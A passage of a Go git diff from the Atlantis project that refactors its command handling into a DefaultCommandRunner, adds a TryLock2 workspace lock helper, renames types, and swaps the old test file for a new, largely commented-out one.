 type AtlantisWorkspaceLocker interface {
 	// TryLock tries to acquire a lock for this repo, workspace and pull.
 	TryLock(repoFullName string, workspace string, pullNum int) bool
+	// TryLock2 tries to acquire a lock for this repo, workspace and pull.
+	TryLock2(repoFullName string, workspace string, pullNum int) (func(), error)
 	// Unlock deletes the lock for this repo, workspace and pull. If there was no
 	// lock it will do nothing.
 	Unlock(repoFullName, workspace string, pullNum int)
@@ -48,6 +50,17 @@ func NewDefaultAtlantisWorkspaceLocker() *DefaultAtlantisWorkspaceLocker {
 	}
 }
 
+func (d *DefaultAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) {
+	if !d.TryLock(repoFullName, workspace, pullNum) {
+		return func() {}, fmt.Errorf("the %s workspace is currently locked by another"+
+			" command that is running for this pull request–"+
+			"wait until the previous command is complete and try again", workspace)
+	}
+	return func() {
+		d.Unlock(repoFullName, workspace, pullNum)
+	}, nil
+}
+
 // TryLock returns true if a lock is acquired for this repo, pull and workspace and
 // false otherwise.
 func (d *DefaultAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace string, pullNum int) bool {
diff --git a/server/events/command_context.go b/server/events/command_context.go
index f986e43cc3..49b0f07268 100644
--- a/server/events/command_context.go
+++ b/server/events/command_context.go
@@ -30,7 +30,6 @@ type CommandContext struct {
 	HeadRepo models.Repo
 	Pull     models.PullRequest
 	// User is the user that triggered this command.
-	User    models.User
-	Command *Command
-	Log     *logging.SimpleLogger
+	User models.User
+	Log  *logging.SimpleLogger
 }
diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go
deleted file mode 100644
index 65bcf3c6f5..0000000000
--- a/server/events/command_handler_test.go
+++ /dev/null
@@ -1,247 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//    http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
-	"bytes"
-	"errors"
-	"log"
-	"strings"
-	"testing"
-
-	"github.com/google/go-github/github"
-	. "github.com/petergtz/pegomock"
-	"github.com/runatlantis/atlantis/server/events"
-	"github.com/runatlantis/atlantis/server/events/mocks"
-	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
-	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/models/fixtures"
-	"github.com/runatlantis/atlantis/server/events/vcs"
-	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
-	logmocks "github.com/runatlantis/atlantis/server/logging/mocks"
-	. "github.com/runatlantis/atlantis/testing"
-)
-
-var operator *mocks.MockPullRequestOperator
-var eventParsing *mocks.MockEventParsing
-var vcsClient *vcsmocks.MockClientProxy
-var ghStatus *mocks.MockCommitStatusUpdater
-var githubGetter *mocks.MockGithubPullGetter
-var gitlabGetter *mocks.MockGitlabMergeRequestGetter
-var workspaceLocker *mocks.MockAtlantisWorkspaceLocker
-var ch events.CommandHandler
-var logBytes *bytes.Buffer
-
-func setup(t *testing.T) {
-	RegisterMockTestingT(t)
-	operator = mocks.NewMockPullRequestOperator()
-	eventParsing = mocks.NewMockEventParsing()
-	ghStatus = mocks.NewMockCommitStatusUpdater()
-	workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker()
-	vcsClient = vcsmocks.NewMockClientProxy()
-	githubGetter = mocks.NewMockGithubPullGetter()
-	gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
-	logger := logmocks.NewMockSimpleLogging()
-	logBytes = new(bytes.Buffer)
-	When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
-	ch = events.CommandHandler{
-		VCSClient:                vcsClient,
-		CommitStatusUpdater:      ghStatus,
-		EventParser:              eventParsing,
-		AtlantisWorkspaceLocker:  workspaceLocker,
-		MarkdownRenderer:         &events.MarkdownRenderer{},
-		GithubPullGetter:         githubGetter,
-		GitlabMergeRequestGetter: gitlabGetter,
-		Logger:              logger,
-		AllowForkPRs:        false,
-		AllowForkPRsFlag:    "allow-fork-prs-flag",
-		PullRequestOperator: operator,
-	}
-}
-
-func TestExecuteCommand_LogPanics(t *testing.T) {
-	t.Log("if there is a panic it is commented back on the pull request")
-	setup(t)
-	ch.AllowForkPRs = true // Lets us get to the panic code.
-	defer func() { ch.AllowForkPRs = false }()
-	When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, nil)).ThenPanic("panic")
-	ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil)
-	_, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
-	Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
-}
-
-func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
-	t.Log("if CommandHandler was constructed with a nil GithubPullGetter an error should be logged")
-	setup(t)
-	ch.GithubPullGetter = nil
-	ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil)
-	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
-}
-
-func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
-	t.Log("if CommandHandler was constructed with a nil GitlabMergeRequestGetter an error should be logged")
-	setup(t)
-	ch.GitlabMergeRequestGetter = nil
-	ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, 1, nil)
-	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
-}
-
-func TestExecuteCommand_GithubPullErr(t *testing.T) {
-	t.Log("if getting the github pull request fails an error should be logged")
-	setup(t)
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
-	ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
-	Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
-	t.Log("if getting the gitlab merge request fails an error should be logged")
-	setup(t)
-	When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
-	ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
-	Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
-	t.Log("if parsing the returned github pull request fails an error should be logged")
-	setup(t)
-	var pull github.PullRequest
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err"))
-
-	ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
-	Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
-	t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
-		" comment saying that this is not allowed")
-	setup(t)
-	ch.AllowForkPRs = false // by default it's false so don't need to reset
-	var pull github.PullRequest
-	modelPull := models.PullRequest{State: models.Open}
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-
-	headRepo := fixtures.GithubRepo
-	headRepo.FullName = "forkrepo/atlantis"
-	headRepo.Owner = "forkrepo"
-	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil)
-
-	ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, nil)
-	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
-}
-
-func TestExecuteCommand_ClosedPull(t *testing.T) {
-	t.Log("if a command is run on a closed pull request atlantis should" +
-		" comment saying that this is not allowed")
-	setup(t)
-	pull := &github.PullRequest{
-		State: github.String("closed"),
-	}
-	modelPull := models.PullRequest{State: models.Closed}
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-	When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil)
-
-	ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
-	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
-}
-
-func TestExecuteCommand_WorkspaceLocked(t *testing.T) {
-	t.Log("if the workspace is locked, should comment back on the pull")
-	setup(t)
-	pull := &github.PullRequest{
-		State: github.String("closed"),
-	}
-	cmd := events.Command{
-		Name:      events.Plan,
-		Workspace: "workspace",
-	}
-
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-	When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false)
-	ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
-	msg := "The workspace workspace is currently locked by another" +
-		" command that is running for this pull request." +
-		" Wait until the previous command is complete and try again."
-	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
-	Equals(t, msg, response.Failure)
-	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num,
-		"**Plan Failed**: "+msg+"\n\n")
-}
-
-func TestExecuteCommand_FullRun(t *testing.T) {
-	t.Log("when running a plan, apply should comment")
-	pull := &github.PullRequest{
-		State: github.String("closed"),
-	}
-	cmdResponse := events.CommandResponse{}
-	for _, c := range []events.CommandName{events.Plan, events.Apply} {
-		setup(t)
-		cmd := events.Command{
-			Name:      c,
-			Workspace: "workspace",
-		}
-		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
-		switch c {
-		case events.Plan:
-			When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-		case events.Apply:
-			When(operator.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-		}
-
-		ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
-		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
-		Equals(t, cmdResponse, response)
-		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-	}
-}
-
-func TestExecuteCommand_ForkPREnabled(t *testing.T) {
-	t.Log("when running a plan on a fork PR, it should succeed")
-	setup(t)
-
-	// Enable forked PRs.
-	ch.AllowForkPRs = true
-	defer func() { ch.AllowForkPRs = false }() // Reset after test.
-
-	var pull github.PullRequest
-	cmdResponse := events.CommandResponse{}
-	cmd := events.Command{
-		Name:      events.Plan,
-		Workspace: "workspace",
-	}
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-	headRepo := fixtures.GithubRepo
-	headRepo.FullName = "forkrepo/atlantis"
-	headRepo.Owner = "forkrepo"
-	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
-	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
-	When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-
-	ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
-
-	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
-	Equals(t, cmdResponse, response)
-	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-}
diff --git a/server/events/command_response.go b/server/events/command_result.go
similarity index 89%
rename from server/events/command_response.go
rename to server/events/command_result.go
index abba3897b4..ff767ddb58 100644
--- a/server/events/command_response.go
+++ b/server/events/command_result.go
@@ -13,8 +13,8 @@
 //
 package events
 
-// CommandResponse is the result of running a Command.
-type CommandResponse struct {
+// CommandResult is the result of running a Command.
+type CommandResult struct {
 	Error          error
 	Failure        string
 	ProjectResults []ProjectResult
diff --git a/server/events/command_handler.go b/server/events/command_runner.go
similarity index 58%
rename from server/events/command_handler.go
rename to server/events/command_runner.go
index bfd25dd935..c54891e87e 100644
--- a/server/events/command_handler.go
+++ b/server/events/command_runner.go
@@ -29,10 +29,11 @@ import (
 
 // CommandRunner is the first step after a command request has been parsed.
 type CommandRunner interface {
-	// ExecuteCommand is the first step after a command request has been parsed.
+	// RunCommentCommand is the first step after a command request has been parsed.
 	// It handles gathering additional information needed to execute the command
 	// and then calling the appropriate services to finish executing the command.
-	ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command)
+	RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand)
+	RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User)
 }
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_github_pull_getter.go GithubPullGetter
@@ -51,14 +52,13 @@ type GitlabMergeRequestGetter interface {
 	GetMergeRequest(repoFullName string, pullNum int) (*gitlab.MergeRequest, error)
 }
 
-// CommandHandler is the first step when processing a comment command.
-type CommandHandler struct {
+// DefaultCommandRunner is the first step when processing a comment command.
+type DefaultCommandRunner struct {
 	VCSClient                vcs.ClientProxy
 	GithubPullGetter         GithubPullGetter
 	GitlabMergeRequestGetter GitlabMergeRequestGetter
 	CommitStatusUpdater      CommitStatusUpdater
 	EventParser              EventParsing
-	AtlantisWorkspaceLocker  AtlantisWorkspaceLocker
 	MarkdownRenderer         *MarkdownRenderer
 	Logger                   logging.SimpleLogging
 	// AllowForkPRs controls whether we operate on pull requests from forks.
@@ -66,17 +66,50 @@ type CommandHandler struct {
 	// AllowForkPRsFlag is the name of the flag that controls fork PR's. We use
 	// this in our error message back to the user on a forked PR so they know
 	// how to enable this functionality.
-	AllowForkPRsFlag    string
-	PullRequestOperator PullRequestOperator
+	AllowForkPRsFlag      string
+	ProjectCommandBuilder ProjectCommandBuilder
+	ProjectCommandRunner  *ProjectCommandRunner
 }
 
-// ExecuteCommand executes the command.
-// If the repo is from GitHub, we don't use headRepo and instead make an API call
-// to get the headRepo. This is because the caller is unable to pass in a
-// headRepo since there's not enough data available on the initial webhook
-// payload.
-func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *Command) {
+func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) {
+	log := c.buildLogger(baseRepo.FullName, pull.Num)
+	ctx := &CommandContext{
+		User:     user,
+		Log:      log,
+		Pull:     pull,
+		HeadRepo: headRepo,
+		BaseRepo: baseRepo,
+	}
+	runFn := func() ([]ProjectResult, error) {
+		projectCmds, err := c.ProjectCommandBuilder.BuildAutoplanCommands(ctx)
+		if err != nil {
+			return nil, err
+		}
+		var results []ProjectResult
+		for _, cmd := range projectCmds {
+			res := c.ProjectCommandRunner.Plan(cmd)
+			results = append(results, ProjectResult{
+				ProjectCommandResult: res,
+				Path:                 cmd.RepoRelPath,
+				Workspace:            cmd.Workspace,
+			})
+		}
+		return results, nil
+	}
+	c.run(ctx, AutoplanCommand{}, runFn)
+}
+
+// RunCommentCommand executes the command.
+// We take in a pointer for maybeHeadRepo because for some events there isn't
+// enough data to construct the Repo model and callers might want to wait until
+// the event is further validated before making an additional (potentially
+// wasteful) call to get the necessary data.
+func (c *DefaultCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand) {
 	log := c.buildLogger(baseRepo.FullName, pullNum)
+	var headRepo models.Repo
+	if maybeHeadRepo != nil {
+		headRepo = *maybeHeadRepo
+	}
 
 	var err error
 	var pull models.PullRequest
@@ -97,13 +130,38 @@ func (c *CommandHandler) ExecuteCommand(baseRepo models.Repo, headRepo models.Re
 		Log:      log,
 		Pull:     pull,
 		HeadRepo: headRepo,
-		Command:  cmd,
 		BaseRepo: baseRepo,
 	}
-	c.run(ctx)
+
+	runFn := func() ([]ProjectResult, error) {
+		var result ProjectCommandResult
+		switch cmd.Name {
+		case Plan:
+			projectCmd, err := c.ProjectCommandBuilder.BuildPlanCommand(ctx, cmd)
+			if err != nil {
+				return nil, err
+			}
+			result = c.ProjectCommandRunner.Plan(projectCmd)
+		case Apply:
+			projectCmd, err := c.ProjectCommandBuilder.BuildApplyCommand(ctx, cmd)
+			if err != nil {
+				return nil, err
+			}
+			result = c.ProjectCommandRunner.Apply(projectCmd)
+		default:
+			ctx.Log.Err("failed to determine desired command, neither plan nor apply")
+		}
+		return []ProjectResult{{
+			Path:                 cmd.Dir,
+			Workspace:            cmd.Workspace,
+			ProjectCommandResult: result,
+		}}, nil
+	}
+
+	c.run(ctx, cmd, runFn)
 }
 
-func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) {
+func (c *DefaultCommandRunner) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) {
 	if c.GithubPullGetter == nil {
 		return models.PullRequest{}, models.Repo{}, errors.New("Atlantis not configured to support GitHub")
 	}
@@ -111,14 +169,14 @@ func (c *CommandHandler) getGithubData(baseRepo models.Repo, pullNum int) (model
 	if err != nil {
 		return models.PullRequest{}, models.Repo{}, errors.Wrap(err, "making pull request API call to GitHub")
 	}
-	pull, repo, err := c.EventParser.ParseGithubPull(ghPull)
+	pull, _, headRepo, err := c.EventParser.ParseGithubPull(ghPull)
 	if err != nil {
-		return pull, repo, errors.Wrap(err, "extracting required fields from comment data")
+		return pull, headRepo, errors.Wrap(err, "extracting required fields from comment data")
 	}
-	return pull, repo, nil
+	return pull, headRepo, nil
 }
 
-func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) {
+func (c *DefaultCommandRunner) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) {
 	if c.GitlabMergeRequestGetter == nil {
 		return models.PullRequest{}, errors.New("Atlantis not configured to support GitLab")
 	}
@@ -130,60 +188,47 @@ func (c *CommandHandler) getGitlabData(baseRepo models.Repo, pullNum int) (model
 	return pull, nil
 }
 
-func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger {
+func (c *DefaultCommandRunner) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger {
 	src := fmt.Sprintf("%s#%d", repoFullName, pullNum)
 	return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel())
 }
 
-func (c *CommandHandler) run(ctx *CommandContext) {
-	defer c.logPanics(ctx)
-
+func (c *DefaultCommandRunner) validateCtxAndComment(ctx *CommandContext) bool {
 	if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner {
 		ctx.Log.Info("command was run on a fork pull request which is disallowed")
 		c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, fmt.Sprintf("Atlantis commands can't be run on fork pull requests. To enable, set --%s", c.AllowForkPRsFlag)) // nolint: errcheck
-		return
+		return false
 	}
 
 	if ctx.Pull.State != models.Open {
 		ctx.Log.Info("command was run on closed pull request")
 		c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, "Atlantis commands can't be run on closed pull requests") // nolint: errcheck
+		return false
+	}
+	return true
+}
+
+func (c *DefaultCommandRunner) run(ctx *CommandContext, command CommandInterface, commandRunner func() ([]ProjectResult, error)) {
+	defer c.logPanics(ctx)
+
+	if !c.validateCtxAndComment(ctx) {
 		return
 	}
 
 	ctx.Log.Debug("updating commit status to pending")
-	if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, ctx.Command); err != nil {
+	if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, command.CommandName()); err != nil {
 		ctx.Log.Warn("unable to update commit status: %s", err)
 	}
-	if !c.AtlantisWorkspaceLocker.TryLock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num) {
-		errMsg := fmt.Sprintf(
-			"The %s workspace is currently locked by another"+
-				" command that is running for this pull request."+
-				" Wait until the previous command is complete and try again.",
-			ctx.Command.Workspace)
-		ctx.Log.Warn(errMsg)
-		c.updatePull(ctx, CommandResponse{Failure: errMsg})
-		return
-	}
-	ctx.Log.Debug("successfully acquired workspace lock")
-	defer c.AtlantisWorkspaceLocker.Unlock(ctx.BaseRepo.FullName, ctx.Command.Workspace, ctx.Pull.Num)
 
-	var cr CommandResponse
-	switch ctx.Command.Name {
-	case Plan:
-		if ctx.Command.Autoplan {
-			cr = c.PullRequestOperator.Autoplan(ctx)
-		} else {
-			cr = c.PullRequestOperator.PlanViaComment(ctx)
-		}
-	case Apply:
-		cr = c.PullRequestOperator.ApplyViaComment(ctx)
-	default:
-		ctx.Log.Err("failed to determine desired command, neither plan nor apply")
+	results, err := commandRunner()
+	if err != nil {
+		c.updatePull(ctx, command, CommandResult{Error: err})
+		return
 	}
-	c.updatePull(ctx, cr)
+	c.updatePull(ctx, command, CommandResult{ProjectResults: results})
 }
 
-func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) {
+func (c *DefaultCommandRunner) updatePull(ctx *CommandContext, command CommandInterface, res CommandResult) {
 	// Log if we got any errors or failures.
 	if res.Error != nil {
 		ctx.Log.Err(res.Error.Error())
@@ -192,15 +237,15 @@ func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) {
 	}
 
 	// Update the pull request's status icon and comment back.
-	if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil {
+	if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, command.CommandName(), res); err != nil {
 		ctx.Log.Warn("unable to update commit status: %s", err)
 	}
-	comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose, ctx.Command.Autoplan)
+	comment := c.MarkdownRenderer.Render(res, command.CommandName(), ctx.Log.History.String(), command.IsVerbose(), command.IsAutoplan())
 	c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck
 }
 
 // logPanics logs and creates a comment on the pull request for panics.
-func (c *CommandHandler) logPanics(ctx *CommandContext) {
+func (c *DefaultCommandRunner) logPanics(ctx *CommandContext) {
 	if err := recover(); err != nil {
 		stack := recovery.Stack(3)
 		c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, // nolint: errcheck
diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
new file mode 100644
index 0000000000..a0d636c9a8
--- /dev/null
+++ b/server/events/command_runner_test.go
@@ -0,0 +1,239 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//    http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+	"bytes"
+	"log"
+	"testing"
+
+	. "github.com/petergtz/pegomock"
+	"github.com/runatlantis/atlantis/server/events"
+	"github.com/runatlantis/atlantis/server/events/mocks"
+	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+	logmocks "github.com/runatlantis/atlantis/server/logging/mocks"
+	//. "github.com/runatlantis/atlantis/testing"
+)
+
+var projectCommandBuilder *mocks.MockProjectCommandBuilder
+var eventParsing *mocks.MockEventParsing
+var vcsClient *vcsmocks.MockClientProxy
+var ghStatus *mocks.MockCommitStatusUpdater
+var githubGetter *mocks.MockGithubPullGetter
+var gitlabGetter *mocks.MockGitlabMergeRequestGetter
+var workspaceLocker *mocks.MockAtlantisWorkspaceLocker
+var ch events.DefaultCommandRunner
+var logBytes *bytes.Buffer
+
+func setup(t *testing.T) {
+	RegisterMockTestingT(t)
+	projectCommandBuilder = mocks.NewMockProjectCommandBuilder()
+	eventParsing = mocks.NewMockEventParsing()
+	ghStatus = mocks.NewMockCommitStatusUpdater()
+	workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker()
+	vcsClient = vcsmocks.NewMockClientProxy()
+	githubGetter = mocks.NewMockGithubPullGetter()
+	gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
+	logger := logmocks.NewMockSimpleLogging()
+	logBytes = new(bytes.Buffer)
+	When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
+	ch = events.DefaultCommandRunner{
+		VCSClient:                vcsClient,
+		CommitStatusUpdater:      ghStatus,
+		EventParser:              eventParsing,
+		MarkdownRenderer:         &events.MarkdownRenderer{},
+		GithubPullGetter:         githubGetter,
+		GitlabMergeRequestGetter: gitlabGetter,
+		Logger:                logger,
+		AllowForkPRs:          false,
+		AllowForkPRsFlag:      "allow-fork-prs-flag",
+		ProjectCommandBuilder: projectCommandBuilder,
+	}
+}
+
+//func TestExecuteCommand_LogPanics(t *testing.T) {
+//	t.Log("if there is a panic it is commented back on the pull request")
+//	setup(t)
+//	ch.AllowForkPRs = true // Lets us get to the panic code.
+//	defer func() { ch.AllowForkPRs = false }()
+//	When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic")
+//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+//	_, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+//	Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
+//}
+//
+//func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
+//	t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged")
+//	setup(t)
+//	ch.GithubPullGetter = nil
+//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+//	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
+//}
+//
+//func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
+//	t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged")
+//	setup(t)
+//	ch.GitlabMergeRequestGetter = nil
+//	ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil)
+//	Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
+//}
+//
+//func TestExecuteCommand_GithubPullErr(t *testing.T) {
+//	t.Log("if getting the github pull request fails an error should be logged")
+//	setup(t)
+//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+//	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+//	Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
+//}
+//
+//func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
+//	t.Log("if getting the gitlab merge request fails an error should be logged")
+//	setup(t)
